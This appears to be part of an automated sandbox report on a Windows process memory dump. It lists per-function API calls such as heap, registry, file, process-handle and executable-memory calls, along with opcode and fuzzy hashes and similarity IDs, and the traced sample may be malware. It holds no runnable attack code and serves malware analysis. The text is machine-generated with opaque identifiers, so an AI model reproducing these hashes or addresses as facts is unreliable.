                              • Opcode Fuzzy Hash: 08912b0484d4ad2c2b19279b4de1577618e07c906e54fb0e8bee5474bc576e53
                              • Instruction Fuzzy Hash: 7231E37A90031AEFDB61DFA8D884A9F7BB9FB44350F004429FE86D3214D2359914CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 01043C8A: RtlEnterCriticalSection.NTDLL(01050488), ref: 01043C92
                                • Part of subcall function 01043C8A: RtlLeaveCriticalSection.NTDLL(01050488), ref: 01043CA7
                                • Part of subcall function 01043C8A: InterlockedIncrement.KERNEL32(0000001C), ref: 01043CC0
                              • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 010416FA
                              • memset.NTDLL ref: 0104170B
                              • lstrcmpi.KERNEL32(?,?), ref: 0104174B
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01041777
                              • memcpy.NTDLL(00000000,?,?), ref: 0104178B
                              • memset.NTDLL ref: 01041798
                              • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 010417B1
                              • memcpy.NTDLL(-00000005,?,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 010417D4
                              • HeapFree.KERNEL32(00000000,?), ref: 010417F1
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                              • String ID:
                              • API String ID: 694413484-0
                              • Opcode ID: f35cb2fc7d0f67d2537bbfda0bd946b9f959f8ca8f65848ee563771e88fca051
                              • Instruction ID: 0a518b69de9d87c201ddb7c7f6ff9ace086287061420851d5c68206a146a675f
                              • Opcode Fuzzy Hash: f35cb2fc7d0f67d2537bbfda0bd946b9f959f8ca8f65848ee563771e88fca051
                              • Instruction Fuzzy Hash: 63419AB5A0021AFFDB60CFA8CCC4B9EBBB9BF04354F144079E985A3250D735AA45CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?,00000000,00000008,00000000,?,0104FAE0,?,?,010501F4), ref: 0103D12D
                              • lstrlen.KERNEL32(010501F4,?,010501F4), ref: 0103D135
                              • lstrlen.KERNEL32(?), ref: 0103D1A0
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0103D1CB
                              • memcpy.NTDLL(00000000,00000002,010500F6), ref: 0103D1DC
                              • memcpy.NTDLL(00000000,?,?), ref: 0103D1F2
                              • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 0103D204
                              • memcpy.NTDLL(00000000,0104A3F8,00000002,00000000,?,?,00000000,?,?), ref: 0103D217
                              • memcpy.NTDLL(00000000,?,00000002), ref: 0103D22C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memcpy$lstrlen$AllocateHeap
                              • String ID:
                              • API String ID: 3386453358-0
                              • Opcode ID: 58b03031f8b17c7ab671127c68099bec97967f6b872282b2dcfd18c0083f8b25
                              • Instruction ID: 3cf985a3d513f60986c92f3f2afa0a2ada6582c524518a6f901c7a88b61dda71
                              • Opcode Fuzzy Hash: 58b03031f8b17c7ab671127c68099bec97967f6b872282b2dcfd18c0083f8b25
                              • Instruction Fuzzy Hash: F3413B76D0020AFBCF10DFE8CC80A9EBBB9FF98214F144456E985A7205E731DA509B90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 01043C8A: RtlEnterCriticalSection.NTDLL(01050488), ref: 01043C92
                                • Part of subcall function 01043C8A: RtlLeaveCriticalSection.NTDLL(01050488), ref: 01043CA7
                                • Part of subcall function 01043C8A: InterlockedIncrement.KERNEL32(0000001C), ref: 01043CC0
                              • RtlAllocateHeap.NTDLL(00000000,010429F2,00000000), ref: 0102EC26
                              • lstrlen.KERNEL32(00000008,?,?,?,010429F2,00000000), ref: 0102EC35
                              • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 0102EC47
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,010429F2,00000000), ref: 0102EC57
                              • memcpy.NTDLL(00000000,00000000,010429F2,?,?,?,010429F2,00000000), ref: 0102EC69
                              • lstrcpy.KERNEL32(00000020), ref: 0102EC9B
                              • RtlEnterCriticalSection.NTDLL(01050488), ref: 0102ECA7
                              • RtlLeaveCriticalSection.NTDLL(01050488), ref: 0102ECFF
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                              • String ID:
                              • API String ID: 3746371830-0
                              • Opcode ID: 21fbce2013ecbffcd473bfed25a764bd66f6589e274d559f07507c51e694c2c4
                              • Instruction ID: afdc4b616ccbe0db5c9998b127da6c57ce133aa3b3a38c3bb6e55027eeb2651a
                              • Opcode Fuzzy Hash: 21fbce2013ecbffcd473bfed25a764bd66f6589e274d559f07507c51e694c2c4
                              • Instruction Fuzzy Hash: F84155B5640719EFDB619F98C984B5ABFF8FF48310F208459F88997214DB36A950CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0103EBB5: RtlAllocateHeap.NTDLL(00000000,?), ref: 0103EBE7
                                • Part of subcall function 0103EBB5: HeapFree.KERNEL32(00000000,00000000,?,?,?,0102A260,?,00000022,?,00000000,010501F4,?,?,0102121E,?,00000000), ref: 0103EC0C
                                • Part of subcall function 0102F0C6: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0102C2AC,?,?,?,?,?,00000022,00000000,00000000), ref: 0102F102
                                • Part of subcall function 0102F0C6: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,0102C2AC,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 0102F155
                              • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 0102C2E1
                              • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 0102C2E9
                              • lstrlen.KERNEL32(?), ref: 0102C2F3
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0102C308
                              • wsprintfA.USER32 ref: 0102C344
                              • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 0102C363
                              • HeapFree.KERNEL32(00000000,?), ref: 0102C378
                              • HeapFree.KERNEL32(00000000,?), ref: 0102C385
                              • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 0102C393
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                              • String ID:
                              • API String ID: 168057987-0
                              • Opcode ID: 21e1b01f8448d7c366a632e5c45a43846eb2e566be9235d60b5637bf44d3ee73
                              • Instruction ID: 5f4824f1a03dfe9e346c5fd5cab53b9e9458950bbb4343accb2e1950b407d8a7
                              • Opcode Fuzzy Hash: 21e1b01f8448d7c366a632e5c45a43846eb2e566be9235d60b5637bf44d3ee73
                              • Instruction Fuzzy Hash: 5231B071600316BFDB21AF64DC44E9FBBE9FF88750F00092AF5C496160D7758918CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNEL32(00000000,C0000000,010223FB,00000000,010223FC,00000080,00000000,00000000,01048BAA,747869A0,010223FB,?), ref: 01026DDA
                              • GetLastError.KERNEL32 ref: 01026DE4
                              • WaitForSingleObject.KERNEL32(000000C8), ref: 01026E09
                              • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 01026E2A
                              • SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 01026E52
                              • WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 01026E67
                              • SetEndOfFile.KERNEL32(00000001), ref: 01026E74
                              • GetLastError.KERNEL32 ref: 01026E80
                              • CloseHandle.KERNEL32(00000001), ref: 01026E8C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                              • String ID:
                              • API String ID: 2864405449-0
                              • Opcode ID: 2df3b763cf73f0a2b45c05d1db62cad53e052f8b20f8bded5d14a95d3a747209
                              • Instruction ID: a8097600ff0dca487df98ae86a5b039b24214f969cfae2a314215da47ecf3b2c
                              • Instruction Fuzzy Hash: 35317C71900218FFEF218FA8DE49BAE7BB9EB04315F104195FA91E61D0C77A8A509F20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000001,00000001,00000000,01030E83,00000008,00000001,00000010,00000001,00000000,0000003A,00000001,00000001), ref: 01029809
                              • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 0102983D
                              • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 01029845
                              • GetLastError.KERNEL32 ref: 0102984F
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 0102986B
                              • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 01029884
                              • CancelIo.KERNEL32(?), ref: 01029899
                              • CloseHandle.KERNEL32(?), ref: 010298A9
                              • GetLastError.KERNEL32 ref: 010298B1
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                              • String ID:
                              • API String ID: 4263211335-0
                              • Opcode ID: a9cec3cdfdef8135763189ec532de57a4691d3aa4fc10933d0dd06a4e67f348d
                              • Instruction ID: d1a3713baf7c96b791b300e516ef8c7b2ece40b576d916a09e9694f6edad6414
                              • Instruction Fuzzy Hash: 4F218D76A00238FFDB119FA8D9888EE7BB9FF48354F044026FA46D3154D77686008BA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0102F00D
                              • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0102F023
                              • _snwprintf.NTDLL ref: 0102F048
                              • CreateFileMappingW.KERNEL32(000000FF,01050244,00000004,00000000,00001000,?), ref: 0102F064
                              • GetLastError.KERNEL32 ref: 0102F076
                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 0102F08D
                              • CloseHandle.KERNEL32(00000000), ref: 0102F0AE
                              • GetLastError.KERNEL32 ref: 0102F0B6
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                              • String ID:
                              • API String ID: 1814172918-0
                              • Opcode ID: 45208e6cc231c9dfca992931306bb6d4623817b9832880401944bf5ee8eba87c
                              • Instruction ID: 9989c068d4f5cfeed461fda17e3bf466037aa50b21b9c66b135a41c205bb8476
                              • Instruction Fuzzy Hash: 982124B6680215FBD720EFA8CD84FCE7BB9AB44780F100061F682E7184DAB99504CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(00000000,?,04B39971,?,?,04B39971,?,?,04B39971,?,?,04B39971,?), ref: 0102B42B
                              • lstrcpyW.KERNEL32(00000000,?), ref: 0102B44E
                              • lstrcatW.KERNEL32(00000000,00000000), ref: 0102B456
                              • lstrlenW.KERNEL32(00000000,?,04B39971,?,?,04B39971,?,?,04B39971,?,?,04B39971,?,?,04B39971,?), ref: 0102B4A1
                              • memcpy.NTDLL(00000000,?,?,?), ref: 0102B509
                              • LocalFree.KERNEL32(?,?), ref: 0102B520
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                              • String ID: P
                              • API String ID: 3649579052-3110715001
                              • Opcode ID: f1bb7cdd5e4699a9187d154a918d35e63ad18f20981ad973827cc10adc96be82
                              • Instruction ID: dc555bf729e471c1a63a17dbc00eee745771951adee1ae398e52523e2c968055
                              • Instruction Fuzzy Hash: A3614B7190021EABDF20DFA8DD84AEFBBBCEF48344B054065FA80E7214DB759905CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0104664E: InterlockedIncrement.KERNEL32(?), ref: 0104669F
                                • Part of subcall function 0104664E: RtlLeaveCriticalSection.NTDLL(04B3C148), ref: 0104672A
                              • OpenProcess.KERNEL32(00000410,0A74F33B,010322DF,00000000,00000000,010322DF,0000001C,00000000,00000000,?,?,?,010322DF), ref: 01038BC7
                              • CloseHandle.KERNEL32(00000000,00000000,00000000,010322EF,00000104,?,?,?,010322DF), ref: 01038BE5
                              • GetSystemTimeAsFileTime.KERNEL32(010322DF), ref: 01038C4B
                              • lstrlenW.KERNEL32(010501E4), ref: 01038CC0
                              • GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 01038CDC
                              • memcpy.NTDLL(00000014,010501E4,00000002), ref: 01038CF4
                                • Part of subcall function 01028F84: RtlLeaveCriticalSection.NTDLL(?), ref: 01029001
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
                              • String ID: o
                              • API String ID: 2541713525-252678980
                              • Opcode ID: f02975de8c43af0fc0347c857a2b9986c120df1b4aec91ea8b47447101280e95
                              • Instruction ID: ae50e6764c981983192f2ebffc3f4c4b1a9e48744809f44e101a147ee1d705c2
                              • Instruction Fuzzy Hash: A651B3B161070AEFE725DF64C884BAAB7ECFF44700F1086AAFA85D7144D774D9408B94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 010364DE: RegCreateKeyA.ADVAPI32(80000001,04B3B7F0,04B38560), ref: 010364F3
                                • Part of subcall function 010364DE: lstrlen.KERNEL32(04B3B7F0,00000000,00000000,0104F072,?,?,?,0102FFEA,00000001,00000001,04B38560), ref: 0103651C
                              • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0102DAC2
                              • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0102DADA
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,010283DE,010395A5,?,00000001), ref: 0102DB3C
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0102DB50
                              • WaitForSingleObject.KERNEL32(00000000,?,00000000,?,?,?,?,?,010283DE,010395A5,?,00000001), ref: 0102DBA2
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,010283DE,010395A5,?,00000001), ref: 0102DBCB
                              • HeapFree.KERNEL32(00000000,010283DE,?,00000000,?,?,?,?,?,010283DE,010395A5,?,00000001), ref: 0102DBDB
                              • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,010283DE,010395A5,?,00000001), ref: 0102DBE4
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                              • String ID:
                              • API String ID: 3503961013-0
                              • Opcode ID: ea8d78c18295b24d964ba863ecc7bac753c2b2a6d16b8e1990fdd88297b90642
                              • Instruction ID: 91c4a8c7763be093b9c6eee7a476b70f325579b4daffcc3ed8a283b7a04a5015
                              • Instruction Fuzzy Hash: 0641D6B5D00219EFDF529FD4DD848EEBBB9FB08344F10406AF545A2124D33A4E54DB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • StrChrA.SHLWAPI(00000000,0000002C,00000000,74785520,767FD3B0,00000001), ref: 0103C35C
                              • StrChrA.SHLWAPI(00000001,0000002C), ref: 0103C36F
                              • StrTrimA.SHLWAPI(00000000,?), ref: 0103C392
                              • StrTrimA.SHLWAPI(00000001,?), ref: 0103C3A1
                              • lstrlen.KERNEL32(74784D40), ref: 0103C3D6
                              • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0103C3E9
                              • lstrcpy.KERNEL32(00000004,74784D40), ref: 0103C407
                              • HeapFree.KERNEL32(00000000,00000000,00000001,00000000,-00000005,00000001), ref: 0103C42B
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                              • String ID:
                              • API String ID: 1974185407-0
                              • Opcode ID: c0fcf8da93f2c4f98dafa1111c51320ac25df25371ed8f3e9900ef4d38d4495b
                              • Instruction ID: d748f8d1120b2404227271e9cc3f357a9738c6da987d70ed7cfd5820c14d09b2
                              • Instruction Fuzzy Hash: C7318E75A00215EBEB219F68C948EAE7FB8FF45740F14805AF985E7204DB759941CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0103A363), ref: 01047D43
                              • wsprintfA.USER32 ref: 01047D6B
                              • lstrlen.KERNEL32(?), ref: 01047D7A
                                • Part of subcall function 010469F0: RtlFreeHeap.NTDLL(00000000,?,010262C2,00000000), ref: 010469FC
                              • wsprintfA.USER32 ref: 01047DBA
                              • wsprintfA.USER32 ref: 01047DEF
                              • memcpy.NTDLL(00000000,?,?), ref: 01047DFC
                              • memcpy.NTDLL(00000008,0104A3F8,00000002,00000000,?,?), ref: 01047E11
                              • wsprintfA.USER32 ref: 01047E34
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                              • String ID:
                              • API String ID: 2937943280-0
                              • Opcode ID: e8186246bd959037540a33b755cd358908ab8102bd2a231e1cfaca66f46f9185
                              • Instruction ID: ce7fd9ba47e21ba6a403cd94133976894f62118070cd366278c3c98f3068d570
                              • Instruction Fuzzy Hash: 9B411CB5A0020AEFDB10DF98D884EAEB7FCEF48308B144565F599D7211EB35EA05CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(?), ref: 01025730
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 01025742
                              • wcstombs.NTDLL ref: 01025750
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?), ref: 01025774
                              • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 01025789
                              • mbstowcs.NTDLL ref: 01025796
                              • HeapFree.KERNEL32(00000000,00000000), ref: 010257A8
                              • HeapFree.KERNEL32(00000000,00000000,?,?), ref: 010257C2
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                              • String ID:
                              • API String ID: 316328430-0
                              • Opcode ID: f2a99919db9fb5d36bd02dbf262fcdb5201b694865d791e8edfcd8121a9bd24c
                              • Instruction ID: cbbfbb52de93c5d5bdf1a5ffad556a1cf688566aa0b71c488d1b437baf8ebebf
                              • Instruction Fuzzy Hash: 1C219875940209FFDF609FA4ED88F8E7FBAFB44300F104125FA41A2064D7369920DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • OpenProcess.KERNEL32(00000040,00000000,?), ref: 0103A0B0
                              • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0103A0CE
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0103A0D6
                              • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 0103A0F4
                              • GetLastError.KERNEL32 ref: 0103A108
                              • RegCloseKey.ADVAPI32(?), ref: 0103A113
                              • CloseHandle.KERNEL32(00000000), ref: 0103A11A
                              • GetLastError.KERNEL32 ref: 0103A122
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                              • String ID:
                              • API String ID: 3822162776-0
                              • Opcode ID: 5ae46fea93239e43a91fb7112eb8b0a4d3f9ac19cae5a28e402dee2fbe0d8ed0
                              • Instruction ID: a5987ddc0dfa08ab9a78b02de44a0a6442aaeecbe2f8f889e77edee0c1628f3b
                              • Instruction Fuzzy Hash: 411112B9340209FFEB215F54D988BAA3BADEB84351F104415FA86C7144DB76CD14DB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: e8c3b4af9b46709afa9b901a00e783eb66d2c2fca91e26280961f99885079ea9
                              • Instruction ID: d7e8172fe18022694cfe74ccf43b709a6545b865ef7d6ec7a6a162647cdb4e40
                              • Instruction Fuzzy Hash: F6B126B9D00229EFEF62DB98CD44AEEBBF8EF09314F0480A6E990B3150D7755A44CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetCommandLineA.KERNEL32(0104C5C8,00000038,01028E54,00000000,747DF5B0,01025001,?,00000001,?,00000000), ref: 0102AAD6
                              • StrChrA.SHLWAPI(00000000,00000020,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?), ref: 0102AAE7
                                • Part of subcall function 0103A53E: lstrlen.KERNEL32(0104F072,04B3C0DC,0104F072,00000000,0103F629), ref: 0103A547
                                • Part of subcall function 0103A53E: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 0103A56A
                                • Part of subcall function 0103A53E: memset.NTDLL ref: 0103A579
                              • ExitProcess.KERNEL32 ref: 0102ACC9
                                • Part of subcall function 010314BF: StrChrA.SHLWAPI(?,?), ref: 010314E4
                                • Part of subcall function 010314BF: StrTrimA.SHLWAPI(?,0104C49C,00000001), ref: 01031503
                                • Part of subcall function 010314BF: StrChrA.SHLWAPI(?,?), ref: 0103150F
                              • lstrcmp.KERNEL32(?,?), ref: 0102AB55
                              • VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,00000000,?,?,?,?,?,?,?,?,?,0103940A), ref: 0102AB6D
                                • Part of subcall function 0102555B: GetLastError.KERNEL32(000000FF,00000008,04B38560,000000FF,04B3B7F0,?,?,0103652C,0000003A,04B3B7F0,?,?,?,0102FFEA,00000001,00000001), ref: 0102559B
                                • Part of subcall function 0102555B: CloseHandle.KERNEL32(000000FF,?,?,0103652C,0000003A,04B3B7F0,?,?,?,0102FFEA,00000001,00000001,04B38560), ref: 010255A6
                              • VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,00000000), ref: 0102ABDF
                              • lstrcmp.KERNEL32(?,?), ref: 0102ABF8
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
                              • String ID:
                              • API String ID: 739714153-0
                              • Opcode ID: 6861b66737258a3e3a4c373f2853be62534d41c9020356d1418152b83fb72052
                              • Instruction ID: fc1f4f3fc2e58ff7679ca0790fbecbf17884e4907a8ae3cc2c35a55ba3c52acb
                              • Instruction Fuzzy Hash: BB516EB1A0022AEFDF25AFA4CD84EEEBBB9BF08710F140565F581E7154EB359941CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(00000000,?,?,?,77E34620,?,?,?,?,0102576D,?,?,?,?,?), ref: 01033DA6
                              • lstrlen.KERNEL32(?,?,?,?,77E34620,?,?,?,?,0102576D,?,?,?,?,?), ref: 01033DC4
                              • RtlAllocateHeap.NTDLL(00000000,74786985,?), ref: 01033DED
                              • memcpy.NTDLL(00000000,00000000,00000000,?,77E34620,?,?,?,?,0102576D,?,?,?,?,?), ref: 01033E04
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01033E17
                              • memcpy.NTDLL(00000000,?,?,?,77E34620,?,?,?,?,0102576D,?,?,?,?,?), ref: 01033E26
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,77E34620,?,?,?,?,0102576D,?,?,?), ref: 01033E8A
                                • Part of subcall function 01028F84: RtlLeaveCriticalSection.NTDLL(?), ref: 01029001
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                              • String ID:
                              • API String ID: 1635816815-0
                              • Opcode ID: f67d14fad6a213414cf0cd9d880c7c0dabd31a672ea3aacdcae2caffe634318e
                              • Instruction ID: e5a481771df82dc6a28b7488e16356062644a01bb0a3f7614526cfa5976ad939
                              • Instruction Fuzzy Hash: D441B275900219EFDB62AFA8DC88BDE7FE9FF44340F044065FA85AB1A0C7759950DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 0102F1A5
                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 0102F1D3
                              • GetWindowThreadProcessId.USER32(?,?), ref: 0102F218
                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0102F240
                              • _strupr.NTDLL ref: 0102F26B
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 0102F278
                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 0102F292
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
                              • String ID:
                              • API String ID: 3831658075-0
                              • Opcode ID: f78999b2cc8e9b7dcb09c79d7ee97552ad2d28085e21c0e01b86b5dd44709c28
                              • Instruction ID: 439be9557f8f26e269f94708bbb8ee4c187691a6fdf6caa4205446df15cb7614
                              • Instruction Fuzzy Hash: 44415E75D0022AEFEF219FA8CD85BDEBBB9AB0A740F104096F691A2150D7758A44CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlImageNtHeader.NTDLL ref: 01026A76
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 01026AB9
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 01026AD4
                              • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 01026B2A
                              • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 01026B85
                              • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 01026B93
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 01026B9E
                                • Part of subcall function 010274C2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 010274D6
                                • Part of subcall function 010274C2: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,0102C607,00000000,00000000,00000001,?,01042FAF,00000020,00000000,?,00000000), ref: 010274FF
                                • Part of subcall function 010274C2: RegCloseKey.ADVAPI32(?,?,0102C607,00000000,00000000,00000001,?,01042FAF,00000020,00000000,?,00000000,?,00000000), ref: 01027553
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenmemcpy
                              • String ID:
                              • API String ID: 2070110485-0
                              • Opcode ID: ea0e9002a7458b5dc3f6298360cecb3576036ddb52c9c0c20e6f3157b2f3b659
                              • Instruction ID: acfaab000f9371951aa226998334ce1f213186425be522077eb1112daff608bf
                              • Instruction Fuzzy Hash: DD416C76200216EFEB229F69D988FAB3BA9EB44741F0440A4FE85DB154DB76D940CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D62B
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D644
                                • Part of subcall function 0103D619: GetCurrentThreadId.KERNEL32 ref: 0103D651
                                • Part of subcall function 0103D619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01042F93,00000000,?,00000000,010243B5,?,?,?,?,?,010243B5,00000000), ref: 0103D65D
                                • Part of subcall function 0103D619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D66B
                                • Part of subcall function 0103D619: lstrcpy.KERNEL32(00000000), ref: 0103D68D
                              • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 0104446A
                              • StrTrimA.SHLWAPI(?,?), ref: 0104448D
